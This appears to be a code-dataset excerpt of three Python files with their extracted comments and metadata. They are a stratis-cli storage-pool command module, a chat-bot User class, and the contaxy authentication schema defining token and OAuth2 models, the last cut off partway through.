:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:param props_map: a map of properties returned by GetAllProperties
:type props_map: dict of str * any
"""
def gen_string(has_property, code):
"""
Generate the display string for a boolean property
:param has_property: whether the property is true or false
:type has_property: bool or NoneType
:param str code: the code to generate the string for
:returns: the generated string
:rtype: str
"""
if has_property == True: # pylint: disable=singleton-comparison
prefix = " "
elif has_property == False: # pylint: disable=singleton-comparison
prefix = "~"
# This is only going to occur if the engine experiences an
# error while calculating a property or if our code has a bug.
else: # pragma: no cover
prefix = "?"
return prefix + code
props_list = [(mopool.HasCache(), "Ca"), (mopool.Encrypted(), "Cr")]
return ",".join(gen_string(x, y) for x, y in props_list)
format_uuid = (
(lambda mo_uuid: mo_uuid) if namespace.unhyphenated_uuids else to_hyphenated
)
def alert_string(mopool):
"""
Alert information to display, if any
:param mopool: object to access pool properties
:returns: string w/ alert information, "" if no alert
:rtype: str
"""
action_availability = PoolActionAvailability.from_str(
mopool.AvailableActions()
)
error_codes = action_availability.pool_maintenance_error_codes()
return ", ".join(sorted(str(code) for code in error_codes))
tables = [
(
mopool.Name(),
physical_size_triple(mopool),
properties_string(mopool),
format_uuid(mopool.Uuid()),
alert_string(mopool),
)
for mopool in pools_with_props
]
print_table(
["Name", "Total Physical", "Properties", "UUID", "Alerts"],
sorted(tables, key=lambda entry: entry[0]),
["<", ">", ">", ">", "<"],
)
@staticmethod
def destroy_pool(namespace):
"""
Destroy a stratis pool.
If no pool exists, the method succeeds.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Manager.Methods.DestroyPool(
proxy, {"pool": pool_object_path}
)
# This branch can be covered, since the engine will return an error
# if the pool can not be destroyed because it has filesystems.
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to destroy the specified pool %s but "
"stratisd reports that it did not actually "
"destroy the pool requested"
)
% namespace.pool_name
)
@staticmethod
def rename_pool(namespace):
"""
Rename a pool.
:raises StratisCliEngineError:
:raises StratisCliNoChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import ObjectManager, Pool, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.current})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Pool.Methods.SetName(
get_object(pool_object_path), {"name": namespace.new}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed:
raise StratisCliNoChangeError("rename", namespace.new)
@staticmethod
def add_data_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified data devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.DATA
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddDataDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the data tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def add_cache_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified cache devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddCacheDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the cache tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def unlock_pools(namespace):
"""
Unlock all of the encrypted pools that have been detected by the daemon
but are still locked.
:raises StratisCliIncoherenceError:
:raises StratisCliNoChangeError:
:raises StratisCliAggregateError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
proxy = get_object(TOP_OBJECT)
locked_pools = _fetch_locked_pools_property(proxy)
if locked_pools == {}: # pragma: no cover
raise StratisCliNoChangeError("unlock", "pools")
# This block is not covered as the sim engine does not simulate the
# management of unlocked devices, so locked_pools is always empty.
errors = [] # pragma: no cover
for uuid in locked_pools: # pragma: no cover
(
(is_some, unlocked_devices),
return_code,
message,
) = Manager.Methods.UnlockPool(
proxy, {"pool_uuid": uuid, "unlock_method": namespace.unlock_method}
)
if return_code != StratisdErrors.OK:
errors.append(
StratisCliPartialFailureError(
"unlock", "pool with UUID %s" % uuid, error_message=message
)
)
if is_some and unlocked_devices == []:
raise StratisCliIncoherenceError(
(
"stratisd reported that some existing devices are locked but "
"no new devices were unlocked during this operation"
)
)
if errors != []: # pragma: no cover
raise StratisCliAggregateError("unlock", "pool", errors)
@staticmethod
def explain_code(namespace):
"""
Print an explanation of pool error code.
"""
error_code = PoolMaintenanceErrorCode.from_str(namespace.code)
assert error_code is not None
print(error_code.explain()) | en | 0.646974 | # Copyright 2021 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Pool actions. # isort: STDLIB # isort: THIRDPARTY Generate a map of pools to which block devices they own :param managed_objects: the result of a GetManagedObjects call :type managed_objects: dict of str * dict :param to_be_added: the blockdevs to be added :type to_be_added: frozenset of str :param tier: tier to search for blockdevs to be added :type tier: _stratisd_constants.BlockDevTiers :returns: a map of pool names to sets of strings containing blockdevs they own :rtype: dict of str * frozenset of str # pylint: disable=import-outside-toplevel Check whether specified blockdevs are already in the other tier. :param managed_objects: the result of a GetManagedObjects call :type managed_objects: dict of str * dict :param to_be_added: the blockdevs to be added :type to_be_added: frozenset of str :param other_tier: the other tier, not the one requested :type other_tier: _stratisd_constants.BlockDevTiers :raises StratisCliInUseOtherTierError: if blockdevs are used by other tier Check whether specified blockdevs are already in the tier to which they are to be added. :param managed_objects: the result of a GetManagedObjects call :type managed_objects: dict of str * dict :param to_be_added: the blockdevs to be added :type to_be_added: frozenset of str :param this_tier: the tier requested :type this_tier: _stratisd_constants.BlockDevTiers :raises StratisCliPartialChangeError: if blockdevs are used by this tier :raises StratisCliInUseSameTierError: if blockdevs are used by this tier in another pool Fetch the LockedPools property from stratisd. :param proxy: proxy to the top object in stratisd :return: a representation of unlocked devices :rtype: dict :raises StratisCliEngineError: # pylint: disable=import-outside-toplevel Pool actions. Create a stratis pool. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: :raises StratisCliNameConflictError: # pylint: disable=import-outside-toplevel # pragma: no cover # pragma: no cover # pylint: disable=too-many-locals Initialize the cache of an existing stratis pool. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: # pylint: disable=import-outside-toplevel # pragma: no cover List all stratis pools. # pylint: disable=import-outside-toplevel Calculate the triple to display for total physical size. The format is total/used/free where the display value for each member of the tuple are chosen automatically according to justbytes' configuration. :param mopool: an object representing all the properties of the pool :type mopool: MOPool :returns: a string to display in the resulting list output :rtype: str Make a string encoding some important properties of the pool :param mopool: an object representing all the properties of the pool :type mopool: MOPool :param props_map: a map of properties returned by GetAllProperties :type props_map: dict of str * any Generate the display string for a boolean property :param has_property: whether the property is true or false :type has_property: bool or NoneType :param str code: the code to generate the string for :returns: the generated string :rtype: str # pylint: disable=singleton-comparison # pylint: disable=singleton-comparison # This is only going to occur if the engine experiences an # error while calculating a property or if our code has a bug. # pragma: no cover Alert information to display, if any :param mopool: object to access pool properties :returns: string w/ alert information, "" if no alert :rtype: str Destroy a stratis pool. If no pool exists, the method succeeds. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: # pylint: disable=import-outside-toplevel # This branch can be covered, since the engine will return an error # if the pool can not be destroyed because it has filesystems. # pragma: no cover Rename a pool. :raises StratisCliEngineError: :raises StratisCliNoChangeError: # pylint: disable=import-outside-toplevel # pragma: no cover # pylint: disable=too-many-locals Add specified data devices to a pool. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: :raises StratisCliInUseOtherTierError: :raises StratisCliInUseSameTierError: :raises StratisCliPartialChangeError: # pylint: disable=import-outside-toplevel # pragma: no cover # pragma: no cover # pylint: disable=too-many-locals Add specified cache devices to a pool. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: :raises StratisCliInUseOtherTierError: :raises StratisCliInUseSameTierError: :raises StratisCliPartialChangeError: # pylint: disable=import-outside-toplevel # pragma: no cover Unlock all of the encrypted pools that have been detected by the daemon but are still locked. :raises StratisCliIncoherenceError: :raises StratisCliNoChangeError: :raises StratisCliAggregateError: # pylint: disable=import-outside-toplevel # pragma: no cover # This block is not covered as the sim engine does not simulate the # management of unlocked devices, so locked_pools is always empty. # pragma: no cover # pragma: no cover # pragma: no cover Print an explanation of pool error code. | 1.521061 | 2 |
synchrobot/chat_user.py | Esenin/telegram_vk_pipe_bot | 2 | 8522 | <reponame>Esenin/telegram_vk_pipe_bot<filename>synchrobot/chat_user.py
# -*- coding: utf-8 -*-
# Author: <NAME>
import calendar
import time
import datetime as dt
import json
class User(object):
def __init__(self, id, name, last_seen, want_time, muted, username="", additional_keys="{}"):
super(User, self).__init__()
self.id = id
self.name = name
self.username = username
self._last_seen = last_seen
self._want_time = want_time
self._muted = muted
self.dirty = True
self.other_keys = json.loads(additional_keys) if additional_keys else {}
def get_seen(self): return self._last_seen
def set_seen(self, seen):
self._last_seen = seen
self.dirty = True
last_seen = property(get_seen, set_seen)
def get_want_time(self): return self._want_time
def set_want_time(self, new_val):
self._want_time = new_val
self.dirty = True
want_time = property(get_want_time, set_want_time)
def get_muted(self): return self._muted
def set_muted(self, new_val):
self._muted = new_val
self.dirty = True
muted = property(get_muted, set_muted)
def update_seen_time(self):
self.last_seen = calendar.timegm(time.gmtime())
def __str__(self):
seen_str = dt.datetime.fromtimestamp(self.last_seen).strftime('%Y-%m-%d %H:%M:%S')
return "User: ({0}{1}, id: {2}, last_seen: {3}, want_time: {4}, muted: {5})".format(
self.name.encode('utf-8'), " (" + self.username + ")" if self.username else "", self.id, seen_str,
self.want_time, self.muted)
def serialized_keys(self):
return json.dumps(self.other_keys)
| # -*- coding: utf-8 -*-
# Author: <NAME>
import calendar
import time
import datetime as dt
import json
class User(object):
def __init__(self, id, name, last_seen, want_time, muted, username="", additional_keys="{}"):
super(User, self).__init__()
self.id = id
self.name = name
self.username = username
self._last_seen = last_seen
self._want_time = want_time
self._muted = muted
self.dirty = True
self.other_keys = json.loads(additional_keys) if additional_keys else {}
def get_seen(self): return self._last_seen
def set_seen(self, seen):
self._last_seen = seen
self.dirty = True
last_seen = property(get_seen, set_seen)
def get_want_time(self): return self._want_time
def set_want_time(self, new_val):
self._want_time = new_val
self.dirty = True
want_time = property(get_want_time, set_want_time)
def get_muted(self): return self._muted
def set_muted(self, new_val):
self._muted = new_val
self.dirty = True
muted = property(get_muted, set_muted)
def update_seen_time(self):
self.last_seen = calendar.timegm(time.gmtime())
def __str__(self):
seen_str = dt.datetime.fromtimestamp(self.last_seen).strftime('%Y-%m-%d %H:%M:%S')
return "User: ({0}{1}, id: {2}, last_seen: {3}, want_time: {4}, muted: {5})".format(
self.name.encode('utf-8'), " (" + self.username + ")" if self.username else "", self.id, seen_str,
self.want_time, self.muted)
def serialized_keys(self):
return json.dumps(self.other_keys) | en | 0.80418 | # -*- coding: utf-8 -*- # Author: <NAME> | 2.751409 | 3 |
backend/src/contaxy/schema/auth.py | Felipe-Renck/contaxy | 0 | 8523 | <gh_stars>0
from datetime import datetime, timezone
from enum import Enum
from typing import Dict, List, Optional
import pydantic
from fastapi import HTTPException, Path, status
from pydantic import BaseModel, EmailStr, Field
from contaxy.schema.exceptions import ClientValueError
from contaxy.schema.shared import MAX_DESCRIPTION_LENGTH
from contaxy.utils.fastapi_utils import as_form
USERS_KIND = "users"
ADMIN_ROLE = "roles/admin"
USER_ROLE = "roles/user"
class AccessLevel(str, Enum):
# Map to: select, insert, update, delete
READ = "read" # Viewer, view: Allows admin access , Can only view existing resources. Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data.
WRITE = "write" # Editor, edit, Contributor : Allows read/write access , Can create and manage all types of resources but can’t grant access to others. All viewer permissions, plus permissions for actions that modify state, such as changing existing resources.
ADMIN = "admin" # Owner : Allows read-only access. Has full access to all resources including the right to edit IAM, invite users, edit roles. All editor permissions and permissions for the following actions
# UNKNOWN = "unknown" # Deny?
@classmethod
def load(cls, access_level: str) -> "AccessLevel":
try:
return cls(access_level.strip().lower())
except ValueError:
raise ClientValueError(f"Access level is unknown {access_level}")
# return cls.UNKNOWN
class TokenPurpose(str, Enum):
USER_API_TOKEN = "user-api-token"
PROJECT_API_TOKEN = "project-api-token"
SERVICE_ACCESS_TOKEN = "service-access-token"
LOGIN_TOKEN = "login-token"
REFRESH_TOKEN = "refresh-token" # For user sessions
# DEPLOYMENT_TOKEN = "deployment-token"
contaxy_token_purposes = {purpose for purpose in TokenPurpose}
class TokenType(str, Enum):
SESSION_TOKEN = "session-token"
API_TOKEN = "api-token"
class AccessToken(BaseModel):
token: str = Field(
...,
example="<PASSWORD>",
description="API Token.",
)
token_type: TokenType = Field(
...,
example=TokenType.API_TOKEN,
description="The type of the token.",
)
subject: str = Field(
...,
example="users/dklqmomr2c8dx9cpb202dsqku",
description="Identifies the principal that is the subject of the token. Usually refers to the user to which the token is issued to.",
)
scopes: List[str] = Field(
...,
example=["projects#read"],
description="List of scopes associated with the token.",
)
created_at: Optional[datetime] = Field(
None,
description="Creation date of the token.",
)
expires_at: Optional[datetime] = Field(
None,
example="2021-04-25T10:20:30.400+02:30",
description="Date at which the token expires and, thereby, gets revoked.",
)
class ApiToken(AccessToken):
description: Optional[str] = Field(
None,
example="Token used for accesing project resources on my local machine.",
max_length=MAX_DESCRIPTION_LENGTH,
description="Short description about the context and usage of the token.",
)
created_by: Optional[str] = Field(
None,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="ID of the user that created this token.",
)
token_purpose: Optional[str] = Field(
None,
example=TokenPurpose.LOGIN_TOKEN,
description="The purpose of the token.",
)
class AuthorizedAccess(BaseModel):
authorized_subject: str
resource_name: Optional[str] = None
access_level: Optional[AccessLevel] = None
access_token: Optional[AccessToken] = None
# Oauth Specific Code
class OAuth2TokenGrantTypes(str, Enum):
PASSWORD = "password"
REFRESH_TOKEN = "refresh_token"
CLIENT_CREDENTIALS = "client_credentials"
AUTHORIZATION_CODE = "authorization_code"
# TODO: Replaced with pydantic class
# class OAuth2TokenRequestForm:
# """OAuth2 Token Endpoint Request Form."""
# def __init__(
# self,
# grant_type: OAuth2TokenGrantTypes = Form(
# ...,
# description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
# ),
# username: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s username."
# ),
# password: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s password."
# ),
# scope: Optional[str] = Form(
# None,
# description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
# ),
# client_id: Optional[str] = Form(
# None,
# description="The client identifier issued to the client during the registration process",
# ),
# client_secret: Optional[str] = Form(
# None,
# description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
# ),
# code: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
# ),
# redirect_uri: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
# ),
# refresh_token: Optional[str] = Form(
# None,
# description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
# ),
# set_as_cookie: Optional[bool] = Form(
# False,
# description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
# ),
# ):
# self.grant_type = grant_type
# self.username = username
# self.password = password
# self.scopes = []
# if scope:
# self.scopes = str(scope).split()
# self.client_id = client_id
# self.client_secret = client_secret
# self.code = code
# self.redirect_uri = redirect_uri
# self.refresh_token = refresh_token
# self.state = state
# self.set_as_cookie = set_as_cookie
@as_form
class OAuth2TokenRequestFormNew(BaseModel):
"""OAuth2 Token Endpoint Request Form."""
grant_type: OAuth2TokenGrantTypes = Field(
...,
description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
)
username: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s username."
)
password: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s password."
)
scope: Optional[str] = Field(
None,
description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
)
client_id: Optional[str] = Field(
None,
description="The client identifier issued to the client during the registration process",
)
client_secret: Optional[str] = Field(
None,
description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
)
code: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
)
redirect_uri: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
)
refresh_token: Optional[str] = Field(
None,
description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
)
state: Optional[str] = Field(
None,
description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
)
set_as_cookie: Optional[bool] = Field(
False,
description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
)
class OAuthToken(BaseModel):
token_type: str = Field(
..., description="The type of token this is, typically just the string `bearer`"
)
access_token: str = Field(..., description="The access token string.")
expires_in: Optional[int] = Field(
None,
description="The expiration time of the access token in seconds.",
)
refresh_token: Optional[str] = Field(
None, description="API token to refresh the sesion token (if it expires)."
)
scope: Optional[str] = Field(
None, description="The scopes contained in the access token."
)
id_token: Optional[str] = Field(
None,
description="OpenID Connect ID Token that encodes the user’s authentication information.",
)
class OAuthTokenIntrospection(BaseModel):
active: bool = Field(
...,
description="Indicator of whether or not the presented token is currently active.",
)
scope: Optional[str] = Field(
None,
description="A space-delimited list of scopes.",
)
client_id: Optional[str] = Field(
None,
description="Client identifier for the OAuth 2.0 client that requested this token.",
)
username: Optional[str] = Field(
None,
description="Human-readable identifier for the resource owner who authorized this token.",
)
token_type: Optional[str] = Field(
None,
description="Type of the token as defined in Section 5.1 of OAuth 2.0 [RFC6749].",
)
exp: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token will expire, as defined in JWT [RFC7519].",
)
iat: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token was originally issued, as defined in JWT [RFC7519].",
)
nbf: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token is not to be used before, as defined in JWT [RFC7519].",
)
sub: Optional[str] = Field(
None,
description="Subject of the token, as defined in JWT [RFC7519]. Usually a machine-readable identifier of the resource owner who authorized this token.",
)
aud: Optional[str] = Field(
None,
description="Service-specific string identifier or list of string identifiers representing the intended audience for this token, as defined in JWT [RFC7519].",
)
iss: Optional[str] = Field(
None,
description="String representing the issuer of this token, as defined in JWT [RFC7519].",
)
jti: Optional[str] = Field(
None,
description="String identifier for the token, as defined in JWT [RFC7519].",
)
uid: Optional[str] = Field(
None,
description="The user ID. This parameter is returned only if the token is an access token and the subject is an end user.",
)
class AuthorizeResponseType(str, Enum):
TOKEN = "token"
CODE = "code"
class OAuth2ErrorDetails(BaseModel):
error: str
class OAuth2Error(HTTPException):
"""Basic exception for OAuth errors.
Implements the [RFC6749 error response](https://tools.ietf.org/html/rfc6749#section-5.2).
"""
def __init__(
self,
error: str,
) -> None:
"""Initializes the exception.
Args:
error: A single ASCII error code from the ones defined in RFC6749.
"""
super(OAuth2Error, self).__init__(
status_code=status.HTTP_400_BAD_REQUEST,
detail=error,
)
# TODO: Not used right now
# class OAuth2AuthorizeRequestForm:
# """OAuth2 Authorize Endpoint Request Form."""
# def __init__(
# self,
# response_type: AuthorizeResponseType = Form(
# ...,
# description="Either code for requesting an authorization code or token for requesting an access token (implicit grant).",
# ),
# client_id: Optional[str] = Form(
# None, description="The public identifier of the client."
# ),
# redirect_uri: Optional[str] = Form(None, description="Redirection URL."),
# scope: Optional[str] = Form(
# None, description="The scope of the access request."
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery",
# ),
# nonce: Optional[str] = Form(None),
# ):
# self.response_type = response_type
# self.client_id = client_id
# self.redirect_uri = redirect_uri
# self.scope = scope
# self.state = state
# self.nonce = nonce
USER_ID_PARAM = Path(
...,
title="User ID",
description="A valid user ID.",
# TODO: add length restriction
)
# User Models
class UserBase(BaseModel):
username: Optional[str] = Field(
None,
example="john-doe",
description="A unique username on the system.",
) # nickname
email: Optional[EmailStr] = Field(
None, example="<EMAIL>", description="User email address."
)
disabled: bool = Field(
False,
description="Indicates that user is disabled. Disabling a user will prevent any access to user-accessible resources.",
)
class UserInput(UserBase):
pass
class UserRegistration(UserInput):
# The password is only part of the user input object and should never returned
# TODO: a password can only be changed when used via oauth password bearer
# TODO: System admin can change passwords for all users
password: Optional[str] = Field(
None,
description="Password for the user. The password will be stored in as a hash.",
)
class User(UserBase):
id: str = Field(
...,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="Unique ID of the user.",
)
technical_user: bool = Field(
False,
description="Indicates if the user is a technical user created by the system.",
)
created_at: datetime = Field(
default_factory=lambda: datetime.now(timezone.utc),
description="Timestamp of the user creation. Assigned by the server and read-only.",
)
last_activity: datetime = Field(
None, # If none the validator below will set last_activity to the create_at time
description="Last time the user accessed the system. Right now this is only updated when the user "
"calls the /users/me endpoint so that call should always be done when the user loads the UI.",
)
@pydantic.validator("last_activity", pre=True, always=True)
def default_last_activity(cls, v: datetime, *, values: Dict) -> datetime:
return v if v is not None else values["created_at"]
has_password: bool = Field(
True,
description="Indicates if the user log in with password or SSO",
)
| from datetime import datetime, timezone
from enum import Enum
from typing import Dict, List, Optional
import pydantic
from fastapi import HTTPException, Path, status
from pydantic import BaseModel, EmailStr, Field
from contaxy.schema.exceptions import ClientValueError
from contaxy.schema.shared import MAX_DESCRIPTION_LENGTH
from contaxy.utils.fastapi_utils import as_form
USERS_KIND = "users"
ADMIN_ROLE = "roles/admin"
USER_ROLE = "roles/user"
class AccessLevel(str, Enum):
# Map to: select, insert, update, delete
READ = "read" # Viewer, view: Allows admin access , Can only view existing resources. Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data.
WRITE = "write" # Editor, edit, Contributor : Allows read/write access , Can create and manage all types of resources but can’t grant access to others. All viewer permissions, plus permissions for actions that modify state, such as changing existing resources.
ADMIN = "admin" # Owner : Allows read-only access. Has full access to all resources including the right to edit IAM, invite users, edit roles. All editor permissions and permissions for the following actions
# UNKNOWN = "unknown" # Deny?
@classmethod
def load(cls, access_level: str) -> "AccessLevel":
try:
return cls(access_level.strip().lower())
except ValueError:
raise ClientValueError(f"Access level is unknown {access_level}")
# return cls.UNKNOWN
class TokenPurpose(str, Enum):
USER_API_TOKEN = "user-api-token"
PROJECT_API_TOKEN = "project-api-token"
SERVICE_ACCESS_TOKEN = "service-access-token"
LOGIN_TOKEN = "login-token"
REFRESH_TOKEN = "refresh-token" # For user sessions
# DEPLOYMENT_TOKEN = "deployment-token"
contaxy_token_purposes = {purpose for purpose in TokenPurpose}
class TokenType(str, Enum):
SESSION_TOKEN = "session-token"
API_TOKEN = "api-token"
class AccessToken(BaseModel):
token: str = Field(
...,
example="<PASSWORD>",
description="API Token.",
)
token_type: TokenType = Field(
...,
example=TokenType.API_TOKEN,
description="The type of the token.",
)
subject: str = Field(
...,
example="users/dklqmomr2c8dx9cpb202dsqku",
description="Identifies the principal that is the subject of the token. Usually refers to the user to which the token is issued to.",
)
scopes: List[str] = Field(
...,
example=["projects#read"],
description="List of scopes associated with the token.",
)
created_at: Optional[datetime] = Field(
None,
description="Creation date of the token.",
)
expires_at: Optional[datetime] = Field(
None,
example="2021-04-25T10:20:30.400+02:30",
description="Date at which the token expires and, thereby, gets revoked.",
)
class ApiToken(AccessToken):
description: Optional[str] = Field(
None,
example="Token used for accesing project resources on my local machine.",
max_length=MAX_DESCRIPTION_LENGTH,
description="Short description about the context and usage of the token.",
)
created_by: Optional[str] = Field(
None,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="ID of the user that created this token.",
)
token_purpose: Optional[str] = Field(
None,
example=TokenPurpose.LOGIN_TOKEN,
description="The purpose of the token.",
)
class AuthorizedAccess(BaseModel):
authorized_subject: str
resource_name: Optional[str] = None
access_level: Optional[AccessLevel] = None
access_token: Optional[AccessToken] = None
# Oauth Specific Code
class OAuth2TokenGrantTypes(str, Enum):
PASSWORD = "password"
REFRESH_TOKEN = "refresh_token"
CLIENT_CREDENTIALS = "client_credentials"
AUTHORIZATION_CODE = "authorization_code"
# TODO: Replaced with pydantic class
# class OAuth2TokenRequestForm:
# """OAuth2 Token Endpoint Request Form."""
# def __init__(
# self,
# grant_type: OAuth2TokenGrantTypes = Form(
# ...,
# description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
# ),
# username: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s username."
# ),
# password: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s password."
# ),
# scope: Optional[str] = Form(
# None,
# description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
# ),
# client_id: Optional[str] = Form(
# None,
# description="The client identifier issued to the client during the registration process",
# ),
# client_secret: Optional[str] = Form(
# None,
# description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
# ),
# code: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
# ),
# redirect_uri: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
# ),
# refresh_token: Optional[str] = Form(
# None,
# description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
# ),
# set_as_cookie: Optional[bool] = Form(
# False,
# description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
# ),
# ):
# self.grant_type = grant_type
# self.username = username
# self.password = password
# self.scopes = []
# if scope:
# self.scopes = str(scope).split()
# self.client_id = client_id
# self.client_secret = client_secret
# self.code = code
# self.redirect_uri = redirect_uri
# self.refresh_token = refresh_token
# self.state = state
# self.set_as_cookie = set_as_cookie
@as_form
class OAuth2TokenRequestFormNew(BaseModel):
"""OAuth2 Token Endpoint Request Form."""
grant_type: OAuth2TokenGrantTypes = Field(
...,
description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
)
username: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s username."
)
password: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s password."
)
scope: Optional[str] = Field(
None,
description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
)
client_id: Optional[str] = Field(
None,
description="The client identifier issued to the client during the registration process",
)
